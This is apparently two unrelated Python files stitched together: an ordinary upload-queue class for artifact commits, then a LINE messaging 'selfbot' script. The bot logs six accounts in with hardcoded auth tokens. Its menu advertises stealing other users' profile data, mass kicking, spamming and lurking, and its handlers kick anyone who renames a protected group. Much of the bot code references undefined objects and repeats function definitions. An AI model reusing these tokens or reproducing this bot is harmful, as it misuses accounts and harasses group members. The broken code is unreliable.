RequestCommitArtifact = collections.namedtuple(
"RequestCommitArtifact", ("artifact_id", "finalize", "before_commit", "on_commit")
)
RequestFinish = collections.namedtuple("RequestFinish", ())
class StepUpload(object):
def __init__(self, api, stats, event_queue, max_jobs, silent=False):
self._api = api
self._stats = stats
self._event_queue = event_queue
self._max_jobs = max_jobs
self._thread = threading.Thread(target=self._thread_body)
self._thread.daemon = True
# Indexed by files' `save_name`'s, which are their ID's in the Run.
self._running_jobs = {}
self._pending_jobs = []
self._artifacts = {}
self._finished = False
self.silent = silent
def _thread_body(self):
# Wait for event in the queue, and process one by one until a
# finish event is received
while True:
event = self._event_queue.get()
if isinstance(event, RequestFinish):
break
self._handle_event(event)
# We've received a finish event. At this point, further Upload requests
# are invalid. Mark that we're done, which is used to tell the last
# upload job that it is last.
self._finished = True
# After a finish event is received, iterate through the event queue
# one by one and process all remaining events.
while True:
try:
event = self._event_queue.get(True, 0.2)
except queue.Empty:
event = None
if event:
self._handle_event(event)
elif not self._running_jobs:
# Queue was empty and no jobs left.
break
def _handle_event(self, event):
if isinstance(event, upload_job.EventJobDone):
job = event.job
job.join()
if job.artifact_id:
if event.success:
self._artifacts[job.artifact_id]["pending_count"] -= 1
self._maybe_commit_artifact(job.artifact_id)
else:
termerror(
"Uploading artifact file failed. Artifact won't be committed."
)
self._running_jobs.pop(job.save_name)
# If we have any pending jobs, start one now
if self._pending_jobs:
event = self._pending_jobs.pop(0)
self._start_upload_job(event)
elif isinstance(event, RequestCommitArtifact):
if event.artifact_id not in self._artifacts:
self._init_artifact(event.artifact_id)
self._artifacts[event.artifact_id]["commit_requested"] = True
self._artifacts[event.artifact_id]["finalize"] = event.finalize
if event.before_commit:
self._artifacts[event.artifact_id]["pre_commit_callbacks"].add(
event.before_commit
)
if event.on_commit:
self._artifacts[event.artifact_id]["post_commit_callbacks"].add(
event.on_commit
)
self._maybe_commit_artifact(event.artifact_id)
elif isinstance(event, RequestUpload):
if event.artifact_id is not None:
if event.artifact_id not in self._artifacts:
self._init_artifact(event.artifact_id)
self._artifacts[event.artifact_id]["pending_count"] += 1
if len(self._running_jobs) == self._max_jobs:
self._pending_jobs.append(event)
else:
self._start_upload_job(event)
else:
raise Exception("Programming error: unhandled event: %s" % str(event))
def _start_upload_job(self, event):
if not isinstance(event, RequestUpload):
raise Exception("Programming error: invalid event")
# Operations on a single backend file must be serialized. if
# we're already uploading this file, put the event on the
# end of the queue
if event.save_name in self._running_jobs:
self._pending_jobs.append(event)
return
# Start it.
job = upload_job.UploadJob(
self._event_queue,
self._stats,
self._api,
self.silent,
event.save_name,
event.path,
event.artifact_id,
event.md5,
event.copied,
event.save_fn,
event.digest,
)
self._running_jobs[event.save_name] = job
job.start()
def _init_artifact(self, artifact_id):
self._artifacts[artifact_id] = {
"pending_count": 0,
"commit_requested": False,
"pre_commit_callbacks": set(),
"post_commit_callbacks": set(),
}
def _maybe_commit_artifact(self, artifact_id):
artifact_status = self._artifacts[artifact_id]
if (
artifact_status["pending_count"] == 0
and artifact_status["commit_requested"]
):
for callback in artifact_status["pre_commit_callbacks"]:
callback()
if artifact_status["finalize"]:
self._api.commit_artifact(artifact_id)
for callback in artifact_status["post_commit_callbacks"]:
callback()
def start(self):
self._thread.start()
def is_alive(self):
return self._thread.is_alive()
def shutdown(self):
self.finish()
self._thread.join()
|
cil.py
|
# -*- coding: utf-8 -*-
#baru
import Acil
from Acil.lib.curve.ttypes import *
from datetime import datetime
from PyDictionary import PyDictionary
from bs4 import BeautifulSoup
from mergedict import MergeDict
from mergedict import ConfigDict
from gtts import gTTS
from pyowm import OWM
from enum import Enum
from django.http import HttpResponse
from flask import Flask, send_from_directory, redirect as redirect_flask, render_template
from random import randint
import time, random, sys, re, os, json
import subprocess, threading, string,codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,cookielib,urllib3
import urllib3
import certifi
import ssl
import html5lib,shutil
import subprocess as cmd
import csv
import os
import errno
import imp
import StringIO
import traceback
import linecache
import stat
import cStringIO
import urlparse
import logging
import argparse
#import mimic
import xml
import base64
import ast
cl = Acil.LINE()
cl.login(token="EnOhPKGkwimXJ8iVuIv5.nqZhqiZgZilGvU4eyth5jq.iV+ciJ+WAZnNjnVY0O8nKYgN1+R6664CfqfnUEnaGW8=")
cl.loginResult()
kt = Acil.LINE()
kt.login(token="EnOhPKGkwimXJ8iVuIv5.nqZhqiZgZilGvU4eyth5jq.iV+ciJ+WAZnNjnVY0O8nKYgN1+R6664CfqfnUEnaGW8=")
kt.loginResult()
ks = Acil.LINE()
ks.login(token="EnlRYqL4DlWKIr9dfIU2.WUI0jVzzeewupQ5tboz8mG.K5G366kQX+YWWdGRGXAwMU2rHcF2hhu0Lm3JmSNUPKI=")
ks.loginResult()
ki = Acil.LINE()
ki.login(token="En8i8ZAR1hsJLRcqWJB7.7aNdCEtbMUaAO9Hiv0qoTW.WOSasGBkESFnM7P/TCYn6cTcF2U7Lgr396M1Yt/z8qo=")
ki.loginResult()
kk = Acil.LINE()
kk.login(token="EnrNejwvrgZlyCoYjSdc.SJRuNecAXNC8sHurfor2ha.jD7wclOBbItb9PXfzVA4BhBq5AkfkfdpkQBVbAigijw=")
kk.loginResult()
kc = Acil.LINE()
kc.login(token="EnXJYMPRuZKWp81hPsk2.buJLD7JrrngDnMf5qDfqyG.60g8dV2Qm2DALXdsVgdjfN7PLoRXoNEm9dLRphHFgjM=")
kc.loginResult()
print "Acil"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage= """\n
▂▃▅▇█▓▒░✴✴(iɥpɐƃuɐqɐq)
═╬════════►∆∆
✴✴(iɥpɐƃuɐqɐq)
═╬════════►
🔘 My name : |╬|
🔘 Bot2 rename: |╬|
🔘 Bot3 rename: |╬|
🔘 Bot4 rename: |╬|
🔘 Bot5 rename: |╬|
🔘 Bot6 rename: |╬|
🔘 All rename: |╬|
🔘 Allbio: |╬|
🔘 My clone @ |╬|
🔘 Bot2 clone @ |╬|
🔘 Bot3 clone @ |╬|
🔘 Bot4 clone @ |╬|
🔘 Bot5 clone @ |╬|
🔘 Bot6 clone @ |╬|
🔘 Comment: |╬|
🔘 Message: |╬|
🔘 Bot1-6 backup |╬|
🔘 Bot1-6 backup |╬|
🔘 Group name: |╬|
═╬════════►∆∆
🔓D̸͟͞e̸͟͞m̸͟͞o̸͟͞t̸͟͞e̸͟͞d̸͟͞.🔓
═╬════════►
|╬| Admin on @
|╬| Expel on @
|╬| Expelal
═╬════════►
📷S̸͟͞T̸͟͞E̸͟͞A̸͟͞L̸͟͞I̸͟͞N̸͟͞G̸͟͞📷
═╬════════►
|╬| Steal
|╬| Steal name @
|╬| Steal Bio @
|╬| Steal status @
|╬| Steal mid @
|╬| Steal contact @
|╬| Steal cover @
|╬| Steal pict @
|╬| Steal group pict
|╬| Midpict: [mid]
|╬| Pict group [name]
|╬| My pict
|╬| My cover
|╬| My name
|╬| My bio
|╬| Pap set:
|╬| Pap
|╬| Image [Text]
═╬════════►
🔐S̸͟͞E̸͟͞C̸͟͞U̸͟͞R̸͟͞Y̸͟͞I̸͟͞T̸͟͞Y̸͟͞🔐
═╬════════►
|╬| Protect:low
|╬| Protect:hight
═╬════════►
🚮L̸͟͞I̸͟͞S̸͟͞T̸͟͞ B̸͟͞A̸͟͞N̸͟͞N̸͟͞E̸͟͞D̸͟͞🚮
═╬════════►
|╬| Ban @
|╬| Unban @
|╬| Banned
|╬| Unbanned
|╬| Ban repeat @
|╬| Add friend @
|╬| Clear banlist
═╬════════►
📲i̲̅n̲̅v̲̅i̲̅t̲̅a̲̅t̲̅i̲̅o̲̅n̲̅📲
═╬════════►
|╬| Invite:[mid]
|╬| Invite user[contact]
|╬| Invite me
|╬| Join all/Masuk
═╬════════►
📴L̸͟͞E̸͟͞A̸͟͞V̸͟͞E̸͟͞ G̸͟͞R̸͟͞O̸͟͞U̸͟͞P̸͟͞📴
═╬════════►
|╬| Bot2 @bye
|╬| Bot3 @bye
|╬| Bot4 @bye
|╬| Bot5 @bye
|╬| Bot6 @bye
|╬| Bye/pulang
|╬| Center @bye
|╬| Bye allgc[own]
═╬════════►
🔫A̸͟͞U̸͟͞T̸͟͞O̸͟͞ S̸͟͞E̸͟͞T̸͟͞ B̸͟͞O̸͟͞T̸͟͞🔫
═╬════════►
|╬| Auto reinvite:on/off
|╬| Auto join:on/off
|╬| Auto leave:on/off
|╬| Auto like:on/off
|╬| Like friend:on/off
|╬| Welcome message:on/off
|╬| Auto notice:on/off
|╬| Blockinvite:on/off
|╬| Auto blockqr:on/off
|╬| Namelock:on/off
|╬| Auto add:on/off
|╬| Check message
|╬| Add message:
|╬| Comment:on/off
|╬| Add comment:
|╬| Check comment
|╬| Backup:on/off
|╬| Gcancel:
|╬| Update welcome:
|╬| Check welcome message
═╬════════►
🚮M̸͟͞O̸͟͞D̸͟͞E̸͟͞ C̸͟͞A̸͟͞N̸͟͞C̸͟͞E̸͟͞L̸͟͞🚮
═╬════════►
|╬| Rejectall
|╬| Clean invites
|╬| Clear invites
═╬════════►
S̸͟͞U̸͟͞R̸͟͞P̸͟͞R̸͟͞I̸͟͞S̸͟͞E̸͟͞ G̸͟͞I̸͟͞F̸͟͞T̸͟͞
═╬════════►
|╬| gift1-15
|╬| Spam gift
|╬| Gift @
═╬════════►
📲N̸͟͞O̸͟͞T̸͟͞I̸͟͞F̸͟͞I̸͟͞C̸͟͞A̸͟͞T̸͟͞I̸͟͞O̸͟͞N̸͟͞ 📲
═╬════════►
|╬| Group list
|╬| Banlist
|╬| Admin list
|╬| Settings
|╬| Ginfo
|╬| TL:[text]
|╬| Miclist
|╬| Micdel @
|╬| Micadd @
═╬════════►
🚮W̸͟͞T̸͟͞F̸͟͞ K̸͟͞I̸͟͞L̸͟͞L̸͟͞ Y̸͟͞O̸͟͞U̸͟͞🚮
═╬════════►
|╬| Cleanse
|╬| Vkick @
|╬| Nk [name]
|╬| Kick:[mid]
|╬| Purge
═╬════════►
💻S̸͟͞P̸͟͞A̸͟͞M͞ S̸͟͞E̸͟͞R̸͟͞V̸͟͞E̸͟͞R̸͟͞💻
═╬════════►
|╬| Spamg[on/off]
|╬| Spam add:
|╬| Spam change:
|╬| Spam start:[number]
|╬| Spam @
|╬| Say a̸͟͞a̸͟͞a̸͟͞
|╬| Me
|╬| Speed
|╬| Debug speed
|╬| My mid
|╬| Gcreator
|╬| Halo
|╬| Bot contact
|╬| Bot mid
|╬| Creator
|╬| System
|╬| Iconfig
|╬| Kernel
|╬| Cpu
|╬| Respon/sname
|╬| Help
|╬| Mc:[mid]
|╬| runtim
|╬| show offenders:on/off
═╬════════►
💻U̸͟͞T̸͟͞I̸͟͞L̸͟͞I̸͟͞T̸͟͞Y̸͟͞💻
═╬════════►
|╬| Lurking
|╬| Lurking result
|╬| Link open
|╬| Link close
|╬| Gurl
|╬| Remove chat
|╬| Bot restart
═╬════════►
💿S̸͟͞E̸͟͞A̸͟͞R̸͟͞C̸͟͞H̸͟͞ C̸͟͞H̸͟͞A̸͟͞T̸͟͞💿
═╬════════►
|╬| Lyric
|╬| Music
|╬| Wiki
|╬| Vidio
|╬| Youtube
|╬| Instagram
|╬| Translate-idn [text]
|╬| Translate-eng [text]
|╬| Translate-thai [text]
|╬| Translate-japan [text]
|╬| Translate-arab [text]
|╬| Translate-korea [text]
|╬| Translate-chin [text]
|╬| Vn-id [text]
|╬| Vn-en [text]
|╬| Vn-jp [text]
|╬| Kalender
|╬| Vn [Text]
|╬| Cek zodiak [Tggl-bulan-tahun]
|╬| Tag on/off
|╬| Emoji [expression]
|╬| Info @[name]
|╬| Ping
|╬| Time
|╬| apakah
|╬| kerang ajaib
|╬| Sticker [expression]
|╬| Mention all
═╬════════►
📣B̸͟͞R̸͟͞O̸͟͞A̸͟͞D̸͟͞C̸͟͞A̸͟͞S̸͟͞T̸͟͞📣
═╬════════►
|╬| Pm cast
|╬| Broadcast
|╬| Spam @[name]
═╬════════►
💻P̸͟͞o̸͟͞w̸͟͞e̸͟͞r̸͟͞💻
═╬════════►
🔘Turn off bots🔘
●▬▬▬▬๑۩Special Thanks۩๑▬▬▬▬▬●
P̸͟͞O̸͟͞W̸͟͞E̸͟͞R̸͟͞ B̸͟͞Y̸͟͞ T̸͟͞C̸͟͞R̸͟͞
Edite ✴✴(iɥpɐƃuɐqɐq)
●▬▬▬▬๑۩TEAM SILUMAN۩๑▬▬▬▬▬●
Creator:by ✴✴(iɥpɐƃuɐqɐq) http://line.me/ti/p/boy29putra
"""
textspeech= """╔═════════════════
║ TEXT TO SPEECH
╠═════════════════
╠➩ 'af' : 'Afrikaans'
╠➩ 'sq' : 'Albanian'
╠➩ 'ar' : 'Arabic'
╠➩ 'hy' : 'Armenian'
╠➩ 'bn' : 'Bengali'
╠➩ 'ca' : 'Catalan'
╠➩ 'zh' : 'Chinese'
╠➩ 'zhcn' : 'Chinese (Mandarin/China)'
╠➩ 'zhtw' : 'Chinese (Mandarin/Taiwan)'
╠➩ 'zhyue' : 'Chinese (Cantonese)'
╠➩ 'hr' : 'Croatian'
╠➩ 'cs' : 'Czech'
╠➩ 'da' : 'Danish'
╠➩ 'nl' : 'Dutch'
╠➩ 'en' : 'English'
╠➩ 'enau' : 'English (Australia)'
╠➩ 'enuk' : 'English (United Kingdom)'
╠➩ 'enus' : 'English (United States)'
╠➩ 'eo' : 'Esperanto'
╠➩ 'fi' : 'Finnish'
╠➩ 'fr' : 'French'
╠➩ 'de' : 'German'
╠➩ 'el' : 'Greek'
╠➩ 'hi' : 'Hindi'
╠➩ 'hu' : 'Hungarian'
╠➩ 'is' : 'Icelandic'
╠➩ 'id' : 'Indonesian'
╠➩ 'it' : 'Italian'
╠➩ 'jp' : 'Japanese'
╠➩ 'km' : 'Khmer (Cambodian)'
╠➩ 'ko' : 'Korean'
╠➩ 'la' : 'Latin'
╠➩ 'lv' : 'Latvian'
╠➩ 'mk' : 'Macedonian'
╠➩ 'no' : 'Norwegian'
╠➩ 'pl' : 'Polish'
╠➩ 'pt' : 'Portuguese'
╠➩ 'ro' : 'Romanian'
╠➩ 'ru' : 'Russian'
╠➩ 'sr' : 'Serbian'
╠➩ 'si' : 'Sinhala'
╠➩ 'sk' : 'Slovak'
╠➩ 'es' : 'Spanish'
╠➩ 'eses' : 'Spanish (Spain)'
╠➩ 'esus' : 'Spanish (United States)'
╠➩ 'sw' : 'Swahili'
╠➩ 'sv' : 'Swedish'
╠➩ 'ta' : 'Tamil'
╠➩ 'th' : 'Thai'
╠➩ 'tr' : 'Turkish'
╠➩ 'uk' : 'Ukrainian'
╠➩ 'vi' : 'Vietnamese'
╠➩ 'cy' : 'Welsh'
╚═════════════════
"""
KAC=[cl,ki,kk,kc,ks,kt]
mid = cl.getProfile().mid
["u350cc7408cc6cc82e056ee046131f925"]
Amid = ki.getProfile().mid
["ub51bc97c5e4f603f1dff35e9512550d3"]
Bmid = kk.getProfile().mid
["uc2e8b426f6591045943eae5304e67c32"]
Cmid = kc.getProfile().mid
["uec09c371e4c19ae01aa3d84857440eb7"]
Dmid = ks.getProfile().mid
["ub23ad49c409ac6773c4a151114e4761c"]
Emid = kt.getProfile().mid
["u0548e577b8d144d19d36617941d15062"]
#Fmid = kl.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid]
admin = ["u350cc7408cc6cc82e056ee046131f925"]
owner = ["u350cc7408cc6cc82e056ee046131f925"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True, "members":1},
'leaveRoom':False,
'timeline':True,
'autoAdd':False,
'message':"Thanks for add Me",
"lang":"JP",
"comment":"AutoLike by ✴✴(iɥpɐƃuɐqɐq) http://line.me/ti/p/boy29putra",
"welmsg":"welcome to group",
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"status":False,
"likeOn":False,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"qr":False,
"welcomemsg":False,
"Backup":False,
"protectionOn":False,
"winvite":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"tag":False,
"autorein":True,
"pelaku":False,
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{},
'copy':False,
'target':{},
'midstarget':{},
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kk.getProfile()
backup = kk.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kt.getProfile()
backup = kt.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d hour %02d minute %02d seconds' % (hours, mins, secs)
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version: #If the Current Version of Python is 3.0 or above
import urllib,request #urllib library for Extracting web pages
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib,request.Request(url, headers = headers)
resp = urllib,request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: #If the Current Version of Python is 2.x
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
#Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "Mention"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = kt.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
kt.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kt.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
kd.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
if op.param3 in Emid:
if op.param2 in mid:
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
#=====================================================================================
if op.param3 in mid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
X = ks.getGroup(op.param1)
X.preventJoinByTicket = False
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
CL.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Emid:
X = kt.getGroup(op.param1)
X.preventJoinByTicket = False
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
#======================================================
if op.param3 in Bmid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
G = kc.getGroup(op.param1)
G.preventJoinByTicket = False
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
